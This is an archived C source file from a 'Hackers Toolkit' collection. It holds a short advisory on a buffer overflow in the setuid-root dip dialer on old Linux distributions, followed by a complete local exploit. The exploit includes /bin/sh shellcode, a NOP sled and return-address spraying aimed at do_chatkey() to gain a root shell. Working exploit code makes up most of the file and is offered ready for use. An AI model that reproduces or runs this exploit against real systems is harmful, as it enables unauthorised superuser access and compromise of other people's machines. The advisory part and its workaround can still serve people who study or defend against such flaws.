home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Toolkit v2.0
/
Hackers_Toolkit_v2.0.iso
/
HTML
/
archive
/
Unix
/
c-src
/
dip-exploit.c
< prev
next >
Wrap
C/C++ Source or Header
|
1999-11-04
|
2KB
|
70 lines
/*
PROGRAM: dip 3.3.7n, and probably other variants
AFFECTED SYSTEMS: Linux - Slackware 3.0 and RedHat 2.1 verified,
others unknown.
IMPACT: Local users can get superuser privleges.
SYNOPSIS: Some Linux distributions come with dip setuid
root by default. There are multiple points in
dip where an unbounded buffer is used with user
supplied data making possible a stack overflow.
Functions in which this appears to be possible
include do_chatkey() and mdm_dial().
WORKAROUND: It is suggested that at least until the source
has been further scrutinized that dip not be
setuid unless necessary.
chmod 0755 dip
If you must have dip setuid, place it in a group
where it can only be executed by trusted users.
SAMPLE EXPLOIT:
*/
/* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
#define PATH_DIP "/usr/sbin/dip"
u_char shell[] = /* courtesy of avalon ;) */
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
u_long esp() { __asm__("movl %esp, %eax"); }
main()
{
u_char buf[1024];
u_long addr;
int i, f;
strcpy(buf, "chatkey ");
addr = esp() - 192;
for (i=8; i<128+16; i+=4)
*((u_long *) (buf+i)) = addr;
for (i=128+16; i<512; i++)
buf[i] = 0x90;
for (i=0; i<strlen(shell); i++)
buf[512+i] = shell[i];
buf[512+i] = '\n';
if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {
perror("temp.dip");
exit(0);
}
write(f, buf, 512+i);
close(f);
execl(PATH_DIP, "dip", "temp.dip", (char *)0);
}
